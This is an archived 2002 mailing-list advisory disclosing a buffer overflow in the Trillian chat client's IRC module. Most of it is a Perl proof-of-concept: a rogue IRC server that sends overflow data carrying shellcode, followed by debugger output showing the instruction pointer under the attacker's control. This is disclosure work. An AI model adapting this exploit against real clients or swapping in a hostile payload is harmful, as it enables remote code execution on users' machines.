trillian buffer overflow

John C. Hennessy Thu, 01 Aug 2002 14:55:19 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Problem:

Trillian's irc modules suffers from a buffer overflow. This allows an attacker to 
execute code of their choice. I have attempted to contact the trillian developers 
about this issue with no success. 


John C. Hennessy
Information security analyst


- ----------------------Proof of concept code-------------------------

#!/usr/local/bin/perl
#---------------------sicillian.pl-----------------------
#- Proof of concept exploit for trillians irc module.   -
#- Tested on trillian 0.73 but i suspect all version    -
#- prior maybe exploited as well.                       -
#-                                                      -
#- John C. Hennessy (Information security analyst)      -
#--------------------------------------------------------

use Socket;

$|=1;

        #egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

$buf = "\x90" x 174;
$buf .= $egg;
#$buf .= "A" x 2;
$buf .= "\x41\x41\x41\x41";
#$buf .= "B" x 80;

my $host = inet_aton("127.0.0.1"); 
my $proto = getprotobyname("tcp");
my $port = 6667;

my $add_port = sockaddr_in($port,$host);

my $ser_sock = socket(SOCKET,PF_INET,SOCK_STREAM,$proto) or die "Cannot open Socket: 
$!";

bind(SOCKET,$add_port) or die "\nCould\'t bind to port $port : $!\n ";

my $connection = listen(SOCKET,5) or die "Could't listen on $port: $! \n";

while(accept(CLIENT,SOCKET)){

# print message from client

#my $ans = <CLIENT>;
#print $ans;

#echo message back to client.

print CLIENT "PING :1986115026\r\n001 :irc.random.org trillian :$buf\r\n";
}

close(SOCKET);

- ------------------Snippet from debugger attached to trillian.exe------------------
Access violation - code c0000005 (first chance)
eax=00000000 ebx=022738c8 ecx=100446d0 edx=00000901 esi=02274e60 edi=022738c8
eip=41414141 esp=0012ca58 ebp=01283718 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
41414141 ??               ???
- ----------------------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBPUhl8zfHYhhTZOYaEQLo8gCg7NHMsCMU+S8LZvFIDdV6R+KKCTYAnjZB
zIVeNwQA8V8j1sWMhi62UAAN
=u3Bs
-----END PGP SIGNATURE-----

trillian buffer overflow

Reply via email to